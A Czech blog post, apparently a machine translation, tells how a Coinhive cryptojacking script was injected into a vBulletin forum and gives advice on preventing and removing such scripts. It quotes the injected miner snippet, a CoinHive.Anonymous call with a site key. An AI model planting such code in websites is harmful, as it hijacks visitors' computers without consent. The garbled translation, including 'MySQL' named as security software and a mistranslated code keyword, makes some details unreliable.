Jak odstranit kryptografický skript Coinhive z vašich webových stránek

Obvykle navštěvuji fórum každý den a já jsem ho předtím neviděl. Takže předpokládám, že se to stalo nějakou dobu v noci, můj čas, když jsem spal.

Používám vBulletin software pro fórum a byl aktualizován na nejnovější verzi. Navíc to bylo pro nás velice překvapivé, protože doména TheWindowsClub.com používá Sucuri Web Antivirus & Firewall , aby se ochránila před online hrozbami a útoky na webu.

Bezpečnostní software počítače MySQL úspěšně zastavil spuštění škodlivého skriptu na svém počítači Windows 10. Zkontroloval jsem to u jiných prohlížečů, jako je Chrome & Edge a výsledky byly stejné.

Po kliknutí pravým tlačítkem myši na webovou stránku fóra a kontrole zdrojového kódu jsem zjistil, že to byl CryptoMiner škodlivý skript CoinHive

Toto je špatný Coinhive Javascript, který se dostal do mého fóra:

var miner = nový CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

V první řadě jsem udělal fórum dolů a informovat Sucuri.

Sucuri lidé vyčistili fórum Coinhive skript, který byl pustil na mé fórum za pár hodin, a všechny bylo v pořádku.

Co je CoinHive

Coinhive nabízí JavaScript horník pro kryptocurrency Monero, který můžete vložit do svých webových stránek a používat CPU počítačů návštěvníků webových stránek, aby minové miny pro vás.

Toto se nazývá Cryptojacking . Zahrnuje zneužívání prohlížečů uživatelů pro dolování šifrovacích prostředků. Někteří majitelé webových stránek ji mohou použít sami, aby vydělali peníze - ale v našem případě dostali injekci.

Když uživatel přistupuje k infikovanému webu, spustí Coinhive JavaScript a doly Monero využívající prostředky CPU uživatele. To může vést k škrcení procesoru a neočekávanému zhroucení systému stroje poškozeného.

Nyní, pokud je váš prohlížeč infikován, uvidíte, jak se vaše využití zdrojů zvýší. Zavřete prohlížeč a bude klesat. Uživatel si může všimnout zahřívání stroje, ventilátor běží rychle nebo rychle vybíjí baterii.

Zeptal jsem se kolegyně Saurabh Mukhekar, aby navštívil mé fórum pomocí svého Mac a uviděl, co se stalo. Také jeho počítač Mac byl ovlivněn, když otevřel fórum se Safari! Je jedním z těch chytrých uživatelů Mac OSX, kteří používají antivirový software pro Mac. Jeho Avast antivirus pro Mac úspěšně zastavil škodlivý skript z běhu.

Uvedený Saurabh,

Malware CoinHive nejen zabije PC se systémem Windows, ale i Mac, protože to je prohlížeč založený na Javascript infekci. Je dobré, že v mýtu nepotřebuji, že Mac nepotřebují antivirový software, jinak by můj počítač byl infikován a můj Mac by měl pokračovat v vymývání mincí pro někoho jiného.

Zabraňte infekci webových stránek CoinHive

1. Nepoužívejte žádné šablony nebo pluginy NULL na vašem webu / fóru
2. Udržujte svůj CMS aktualizovaný na nejnovější verzi
3. Aktualizujte svůj hostingový software pravidelně (PHP, databáze atd.)
4. Zabezpečte své webové stránky s poskytovateli zabezpečení webu, jako jsou Sucuri, Cloudflare, Wordfence atd.
5. Proveďte základní opatření k zabezpečení vašeho blogu.

Odstranění mince CoinHive z webových stránek

Nejprve musíte být webmasterem infikované webové stránky - nebo mít pověření správce, která vám umožní přístup ke všem souborům webových stránek.

Nyní, když antivirový program detekuje infekci CoinHive, klepněte pravým tlačítkem na webovou stránku a vyberte Zobrazit zdrojový kód. Potom stiskněte Ctrl + F a vyhledejte "CoinHive".

Jakmile zjistíte umístění škodlivého kódu, musíte vidět jeho polohu - kde se nachází. Nyní ji musíte ručně odstranit. Chcete-li to provést, potřebujete trochu kódovací znalosti vaší platformy. Budete muset vyhledat infikovaný soubor a ručně odstranit z něj skript. Pokud si nejste jisti, požádejte odborníka, aby to udělal. Protože používáme Sucuri, dovolili nám to.

Po dokončení vyčistěte mezipaměť serveru a prohlížeče. Pokud používáte libovolný mezipaměťový plugin nebo MaxCDN, vyčistěte i tyto mezipaměti.

Chraňte se před skripty dolování krypto

Technologie Cryptocurrencies & Blockchain přebírá svět. Vytváří dopad na světovou ekonomiku a způsobuje také narušení technologií. Každý se začal soustředit na tak lukrativní trh - a to zahrnuje také hackery na webu. Vzhledem k nárůstu výnosů bychom měli očekávat, že takové technologie budou zneužívány. To je ta temná stránka jakékoliv vznikající technologie.

Co můžeme udělat, je vždy nejlépe dodržovat nejvhodnější opatření. Kromě použití dobrého bezpečnostního softwaru použijte rozšíření Chrome nebo Firefox, které blokuje webové stránky, aby používaly vaše CPU, aby mohli používat Cryptoinvestor - nebo ještě lépe, pomocí programu Anti-WebMiner, který zastaví útok Cryptojacking Mining Script úpravou souboru Hosts. Funguje na všech prohlížečích. Pokud jste uživatelé Mac, obraťte se prosím také na antivirový software pro váš počítač.

Pokud jste někdy měli pocit, že byste mohli navštívit infikované stránky, bylo by dobré vyčistit váš prohlížeč cache a skenování vašeho stroje pomocí antivirového softwaru, stejně jako AdwCleaner

Zůstaňte v bezpečí, zůstaňte v pohotovosti